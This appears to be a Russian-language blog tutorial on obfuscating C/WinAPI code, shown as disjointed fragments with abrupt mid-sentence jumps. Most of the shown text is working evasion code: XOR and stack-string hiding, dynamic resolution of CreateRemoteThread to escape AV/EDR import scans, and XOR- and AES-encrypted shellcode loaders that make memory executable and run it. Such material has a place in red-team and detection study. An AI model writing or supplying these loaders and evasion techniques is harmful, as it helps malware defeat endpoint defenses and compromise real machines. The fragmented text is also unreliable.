Обфускация кода C/WinAPI: от основ до
продвинутых техник
Posted on 28 марта, 2026 by AkaTor
Категория: Red Team / Blue Team / Purple Team
Уровень: Beginner → Expert
Автор: Aka Tor
Введение
Обфускация — это искусство сделать код непонятным для анализа, сохраняя его

        }
    }
    // Расшифровка в рантайме (на стеке, не в .rdata)
    char* decrypt() const {
        // Выделяем на стеке — не будет видно в heap dump
        char* buf = (char*)_alloca(N);
        for (int i = 0; i < N; i++) {
            buf[i] = data[i] ^ Key;
        }
        return buf;
    }
};
// Макрос для удобства
#define OBF(str) ([]() { \
    constexpr ObfString<sizeof(str), 0x5A> s(str); \
    return s.decrypt(); \
}())
// Использование:
HMODULE h = LoadLibraryA(OBF("ntdll.dll"));
// В бинарнике строки "ntdll.dll" нет!
1.5 Stack strings — строки на стеке
// Stack strings: каждый символ присваивается отдельно
// Строка не существует как целое в .rdata секции
// Собирается только в рантайме на стеке
char ntdll[10];
ntdll[0] = 'n';
ntdll[1] = 't';
ntdll[2] = 'd';
ntdll[3] = 'l';
ntdll[4] = 'l';
ntdll[5] = '.';
ntdll[6] = 'd';
ntdll[7] = 'l';
ntdll[8] = 'l';
ntdll[9] = '\0';
HMODULE h = LoadLibraryA(ntdll);
// Компилятор может оптимизировать обратно в строку!
// Используем volatile или pragma optimize("", off):
#pragma optimize("", off)
void BuildString(char* buf) {
    buf[0] = 'n'; buf[1] = 't'; buf[2] = 'd';
    buf[3] = 'l'; buf[4] = 'l'; buf[5] = '.';
    buf[6] = 'd'; buf[7] = 'l'; buf[8] = 'l';
    buf[9] = '\0';
}
#pragma optimize("", on)
2. Скрытие WinAPI импортов
2.1 Проблема: Import Address Table
Когда вы вызываете CreateRemoteThread напрямую, она попадает в IAT бинарника.
AV/EDR сканирует IAT:
$ dumpbin /imports payload.exe
    ...
    KERNEL32.dll
        CreateRemoteThread    ← RED FLAG
        VirtualAllocEx        ← RED FLAG
        WriteProcessMemory    ← RED FLAG
    ...
→ Мгновенный детект по комбинации импортов
2.2 Dynamic API Resolution — GetProcAddress
// Вместо прямого вызова — резолвим адрес в рантайме
// IAT не содержит подозрительных импортов
typedef HANDLE (WINAPI *pCreateRemoteThread)(
    HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T,
    LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD
);
// Загружаем и резолвим
HMODULE hKernel32 = LoadLibraryA("kernel32.dll"); // или
GetModuleHandleA
pCreateRemoteThread fnCreateRemoteThread =

};
void DecryptAndExecute() {
    // Расшифровка
    SIZE_T scSize = sizeof(encShellcode);
    PBYTE sc = (PBYTE)malloc(scSize);
    memcpy(sc, encShellcode, scSize);
    for (SIZE_T i = 0; i < scSize; i++) {
        sc[i] ^= key[i % sizeof(key)];
    }
    // Выделение executable памяти
    PVOID execMem = VirtualAlloc(NULL, scSize,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(execMem, sc, scSize);
    // Смена прав: RW → RX
    DWORD oldProtect;
    VirtualProtect(execMem, scSize, PAGE_EXECUTE_READ, &oldProtect);
    // Выполнение
    ((void(*)())execMem)();
    // Очистка
    SecureZeroMemory(sc, scSize);
    free(sc);
}
4.2 AES-шифрование (более стойкое)
// AES-256 шифрование шеллкода через WinAPI (BCrypt)
// AES не ломается xortool — реальное шифрование
#include <bcrypt.h>
#pragma comment(lib, "bcrypt.lib")
BOOL AesDecrypt(PBYTE ciphertext, DWORD ctLen, PBYTE key, PBYTE iv,
                PBYTE* plaintext, DWORD* ptLen) {
    BCRYPT_ALG_HANDLE hAlg = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    NTSTATUS status;
    // Открыть провайдер AES
    BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
    // Установить режим CBC
    BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE,
        (PUCHAR)BCRYPT_CHAIN_MODE_CBC,
        sizeof(BCRYPT_CHAIN_MODE_CBC), 0);
    // Создать ключ
    BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, key, 32, 0);
    // Узнать размер plaintext
    BCryptDecrypt(hKey, ciphertext, ctLen, NULL,
        iv, 16, NULL, 0, ptLen, BCRYPT_BLOCK_PADDING);
    // Расшифровать
    *plaintext = (PBYTE)malloc(*ptLen);
    BYTE ivCopy[16];
    memcpy(ivCopy, iv, 16); // BCryptDecrypt модифицирует IV
    BCryptDecrypt(hKey, ciphertext, ctLen, NULL,
        ivCopy, 16, *plaintext, *ptLen, ptLen, BCRYPT_BLOCK_PADDING);
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlg, 0);
    return TRUE;
}
// Использование:
BYTE aesKey[32] = { /* 256-bit key */ };
BYTE aesIV[16]  = { /* 128-bit IV */ };
PBYTE decrypted = NULL;
DWORD decLen = 0;
AesDecrypt(encShellcode, sizeof(encShellcode),
           aesKey, aesIV, &decrypted, &decLen);
// ... copy to RX memory and execute
4.3 Шифрование через SystemFunction032/033 (без BCrypt)
// SystemFunction032/033: RC4 шифрование через недокументированную
WinAPI